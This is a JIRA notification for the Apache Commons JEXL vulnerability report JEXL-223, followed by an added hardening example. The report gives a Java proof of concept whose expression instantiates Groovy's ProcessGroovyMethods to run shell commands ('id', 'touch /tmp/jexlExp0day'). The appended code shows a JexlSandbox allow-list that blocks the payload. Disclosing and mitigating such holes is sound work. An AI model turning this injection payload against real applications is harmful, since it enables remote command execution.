[ https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15978236#comment-15978236 ]
Bruno P. Kinoshita commented on JEXL-223:
-----------------------------------------

Edited to add code format. Also, see http://www.apache.org/security/. For security/vulnerability issues, it is better to follow the guidelines provided by the ASF Security Team when disclosing issues like this.

> Apache Commons JEXL Expression Execute Command Vulnerability
> ------------------------------------------------------------
>
>                 Key: JEXL-223
>                 URL: https://issues.apache.org/jira/browse/JEXL-223
>             Project: Commons JEXL
>          Issue Type: Bug
>            Reporter: cnbird
>            Priority: Critical
>
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerability through Groovy.
> 0x02 POC
> {code}
> import java.io.IOException;
>
> import org.apache.commons.jexl3.JexlBuilder;
> import org.apache.commons.jexl3.JexlContext;
> import org.apache.commons.jexl3.JexlEngine;
> import org.apache.commons.jexl3.JexlExpression;
> import org.apache.commons.jexl3.MapContext;
> import org.codehaus.groovy.runtime.ProcessGroovyMethods;
>
> public class elExp {
>     public static void main(String[] args) throws IOException {
>         // Create or retrieve an engine. Default settings: no sandbox, so any class
>         // on the classpath can be instantiated by name from an expression.
>         JexlEngine jexl = new JexlBuilder().create();
>
>         // Sanity check outside JEXL: Groovy's ProcessGroovyMethods.execute(String)
>         // spawns the command (it is a static method, so calling it on an instance works).
>         ProcessGroovyMethods n = new ProcessGroovyMethods();
>         System.out.println(n.execute("id").toString());
>
>         // Create an expression: new("className") instantiates the class by name and
>         // .execute(...) is then resolved by reflection on the resulting object.
>         //String jexlExp = "new(\"java.lang.String\", \"hello world\")";
>         String jexlExp = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
>         JexlExpression e = jexl.createExpression(jexlExp);
>
>         // Create a context and add data (this expression does not reference any variable)
>         JexlContext jc = new MapContext();
>
>         // Now evaluate the expression, getting the result: the java.lang.Process of the
>         // spawned "touch"; the side effect is the file /tmp/jexlExp0day being created.
>         Object o = e.evaluate(jc);
>         System.out.println(o);
>     }
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
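The POC above works because the engine is built with default settings: `new("...")` can name any class on the classpath, and the method call on the result is resolved by reflection with no restrictions. The following is an added example, written for this page and not taken from the issue or from the JEXL project, showing the same engine built with a `JexlSandbox` so that the payload is refused. It assumes JEXL 3.x (`org.apache.commons.jexl3.introspection.JexlSandbox`, `JexlBuilder.sandbox(...)`), where `new JexlSandbox(false)` creates a "black" sandbox in which any class without an explicit entry is blocked, and a strict, non-silent engine so that an unresolvable constructor or method raises a `JexlException` instead of quietly evaluating to null. The class name `SandboxedJexl`, the helper names and the sample expressions are mine.

```java
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlException;
import org.apache.commons.jexl3.MapContext;
import org.apache.commons.jexl3.introspection.JexlSandbox;

// Added example, not part of JEXL-223 or of the JEXL code base.
// Assumes JEXL 3.x on the classpath (Groovy only matters for the payload string).
public class SandboxedJexl {

    // Builds an engine that can only touch classes and members listed below.
    static JexlEngine hardenedEngine() {
        // false = "black" sandbox: a class with no explicit permissions is blocked entirely,
        // so new("org.codehaus.groovy.runtime.ProcessGroovyMethods") cannot find a constructor.
        JexlSandbox sandbox = new JexlSandbox(false);

        // Whitelist only what the expressions actually need. Naming methods turns the
        // String entry into an explicit allow-list: anything not named (getBytes, getClass,
        // the constructor, ...) stays blocked even though String itself is listed.
        sandbox.white(String.class.getName())
               .execute("trim", "toUpperCase", "length");

        return new JexlBuilder()
                .sandbox(sandbox)
                .strict(true)   // unresolved constructors/methods throw instead of yielding null
                .silent(false)  // errors propagate to the caller rather than being logged away
                .create();
    }

    // Evaluates an expression against an empty context and reports the outcome.
    static String tryEval(JexlEngine jexl, String expr) {
        JexlContext ctx = new MapContext();
        try {
            Object result = jexl.createExpression(expr).evaluate(ctx);
            return "allowed: " + result;
        } catch (JexlException ex) {
            // Raised when the sandbox refuses a constructor, method or property.
            return "blocked: " + ex.getMessage();
        }
    }

    public static void main(String[] args) {
        JexlEngine jexl = hardenedEngine();

        // The payload from the issue: refused, because ProcessGroovyMethods is not whitelisted,
        // so /tmp/jexlExp0day is never created.
        String payload = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\")"
                       + ".execute(\"touch /tmp/jexlExp0day\")";
        System.out.println(tryEval(jexl, payload));

        // Whitelisted String methods still work for legitimate templates.
        System.out.println(tryEval(jexl, "' hello '.trim().toUpperCase()"));
        System.out.println(tryEval(jexl, "'hello'.length()"));

        // A String method that is not on the allow-list is refused as well.
        System.out.println(tryEval(jexl, "'hello'.getBytes()"));
    }
}
```

Two caveats a practitioner should keep in mind: the sandbox only governs what the engine resolves through its introspector, so whitelisting a class that hands out reflection (anything exposing `getClass()` or `Class.forName`) reopens the same hole; and a sandbox is a second line of defence, not a reason to pass attacker-controlled strings into `createExpression` in the first place.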